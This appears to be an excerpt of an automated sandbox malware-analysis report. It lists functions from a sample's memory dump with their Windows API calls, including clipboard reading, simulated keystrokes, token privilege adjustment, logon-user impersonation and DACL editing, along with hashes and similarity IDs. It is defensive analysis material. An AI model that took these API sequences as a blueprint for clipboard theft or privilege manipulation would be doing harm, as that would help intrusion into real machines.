                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3667716007-0
                                                                                                                                                                                                                                          • Opcode ID: c51ae943452bd1db8a8ac87c1fa09a5b33054f059ee97dc09745e870b4e98593
                                                                                                                                                                                                                                          • Instruction ID: 481a91bd8a43e069c5d576d42e0e96ff1ab154ec6b186b4856b2da4b761552d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c51ae943452bd1db8a8ac87c1fa09a5b33054f059ee97dc09745e870b4e98593
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95E0862170434416C604BB79A8525FDBB599BD6761F40153FF18283363DF6489854272
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0011039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00110704,?,?,00000000,?,00110704,00000000,0000000C), ref: 001103B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: d3d94353d686bca887964e7525c960f0a41207753d4d3c5a8fe7069c38fe0ff8
                                                                                                                                                                                                                                          • Instruction ID: 39affdb812513899b39c8a67cf64b4eb9d383045785f874eb4bee2c59d9bc1bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3d94353d686bca887964e7525c960f0a41207753d4d3c5a8fe7069c38fe0ff8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD06C3204010DFBDF029F84DD06EDA3BAAFB48714F014000FE5856020C772E861AB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 000D1CBC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoParametersSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3098949447-0
                                                                                                                                                                                                                                          • Opcode ID: a6955c8f0dfc272768c83e7d56d21cf5d7f582fb0a5633cfe016d7614e223b74
                                                                                                                                                                                                                                          • Instruction ID: 72d88d18c50e5cd2f3fd6c7061e4d072bc717c2bd894c9da616091e16b4ee7ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6955c8f0dfc272768c83e7d56d21cf5d7f582fb0a5633cfe016d7614e223b74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEC09B35380305AFF6144B94BC4AF507754B749B10F044001F64995DE3C3F11490DA90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00169576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0016961A
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0016965B
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0016969F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001696C9
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 001696F2
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0016978B
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000009), ref: 00169798
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001697AE
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 001697B8
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001697E9
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00169810
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001030,?,00167E95), ref: 00169918
                                                                                                                                                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0016992E
                                                                                                                                                                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00169941
                                                                                                                                                                                                                                          • SetCapture.USER32(?), ref: 0016994A
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 001699AF
                                                                                                                                                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001699BC
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001699D6
                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 001699E1
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00169A19
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00169A26
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00169A80
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00169AAE
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00169AEB
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00169B1A
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00169B3B
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00169B4A
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00169B68
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00169B75
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00169B93
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00169BFA
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00169C2B
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00169C84
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00169CB4
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00169CDE
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00169D01
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00169D4E
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00169D82
                                                                                                                                                                                                                                            • Part of subcall function 000E9944: GetWindowLongW.USER32(?,000000EB), ref: 000E9952
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00169E05
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                          • API String ID: 3429851547-4164748364
                                                                                                                                                                                                                                          • Opcode ID: d691fda403cb03a389f2f0e76168aefa645cd9a5505c0409c90d9f02c847c305
                                                                                                                                                                                                                                          • Instruction ID: 63e98afe40a8151931614c2c04d04d42ea29c27cb259a9d3cc229b6e9350dc6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d691fda403cb03a389f2f0e76168aefa645cd9a5505c0409c90d9f02c847c305
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96428C75204341AFDB24CF28CC44EAABBE9FF49314F14061AF699976A1D771E8A0CF91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000EF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000EF998
                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012F474
                                                                                                                                                                                                                                          • IsIconic.USER32(00000000), ref: 0012F47D
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000009), ref: 0012F48A
                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0012F494
                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012F4AA
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0012F4B1
                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012F4BD
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0012F4CE
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0012F4D6
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0012F4DE
                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0012F4E1
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F4F6
                                                                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0012F501
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F50B
                                                                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0012F510
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F519
                                                                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0012F51E
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F528
                                                                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0012F52D
                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0012F530
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0012F557
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                          • Opcode ID: 0a3c16402d3858bc14782e57650bf822cab37333d1b501f12fda72083f105f09
                                                                                                                                                                                                                                          • Instruction ID: 80b564937a3171e84fb4ad632593dab0b3a8c6816f1d583a729499f9b2797eef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a3c16402d3858bc14782e57650bf822cab37333d1b501f12fda72083f105f09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36315071B40228BEEB206BB59C4AFBF7E7CEB44B50F10402AF601E61D1C7F15951AAA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 001316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
                                                                                                                                                                                                                                            • Part of subcall function 001316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
                                                                                                                                                                                                                                            • Part of subcall function 001316C3: GetLastError.KERNEL32 ref: 0013174A
                                                                                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00131286
                                                                                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001312A8
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001312B9
                                                                                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001312D1
                                                                                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 001312EA
                                                                                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 001312F4
                                                                                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00131310
                                                                                                                                                                                                                                            • Part of subcall function 001310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001311FC), ref: 001310D4
                                                                                                                                                                                                                                            • Part of subcall function 001310BF: CloseHandle.KERNEL32(?,?,001311FC), ref: 001310E9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                                                                                          • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                          • Opcode ID: 584e8a727324b4cc7b4f8545f9abf224b3b4ac908fe9cf958d885dc0a7fa4cb7
                                                                                                                                                                                                                                          • Instruction ID: bc4cf6b2464bf96c67a1da32789a89d2ee5976b21fb858089e1d760a3789a5c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 584e8a727324b4cc7b4f8545f9abf224b3b4ac908fe9cf958d885dc0a7fa4cb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF817971900249BFDF219FA8DC49BFE7BB9EF04704F144129F911B62A0DBB59984CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00130B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00131114
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131120
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 0013112F
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131136
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013114D
                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00130BCC
                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00130C00
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00130C17
                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00130C51
                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00130C6D
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00130C84
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00130C8C
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00130C93
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00130CB4
                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00130CBB
                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00130CEA
                                                                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00130D0C
                                                                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00130D1E
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130D45
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D4C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130D55
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D5C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130D65
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D6C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00130D78
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D7F
                                                                                                                                                                                                                                            • Part of subcall function 00131193: GetProcessHeap.KERNEL32(00000008,00130BB1,?,00000000,?,00130BB1,?), ref: 001311A1
                                                                                                                                                                                                                                            • Part of subcall function 00131193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00130BB1,?), ref: 001311A8
                                                                                                                                                                                                                                            • Part of subcall function 00131193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00130BB1,?), ref: 001311B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                                                                          • Opcode ID: 4dc16af2ef0bbd26047c7653dd2e35abcfbe2b698a07dc0daf675199a02c093e
                                                                                                                                                                                                                                          • Instruction ID: df89d4622da0ce0a1771161a1e93f006926361d403ed5c4c01abb30a04f75d78
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc16af2ef0bbd26047c7653dd2e35abcfbe2b698a07dc0daf675199a02c093e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1571667690020AEBDF11DFE4DC48BBEBBF8BF09310F044655F954A6291D7B1AA45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OpenClipboard.USER32(0016CC08), ref: 0014EB29
                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0014EB37
                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0014EB43
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0014EB4F
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0014EB87
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0014EB91
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0014EBBC
                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0014EBC9
                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 0014EBD1
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0014EBE2
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?), ref: 0014EC22
                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0014EC38
                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 0014EC44
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0014EC55
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0014EC77
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0014EC94
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0014ECD2
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0014ECF3
                                                                                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 0014ED14
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0014ED59
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                                                                                          • Opcode ID: 82b6563b76daacaf500472f54d266d8f9907d0a8e655f76355a7081dee0decbb
                                                                                                                                                                                                                                          • Instruction ID: 7ebf04b1ba1f7e43d64acc23cb1abcaa7e2c0821f5b907cc5038c546825bdb65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82b6563b76daacaf500472f54d266d8f9907d0a8e655f76355a7081dee0decbb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E618835204301AFD300EF64D898F7AB7E4BF84714F18451AF896972A2CB71E985CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

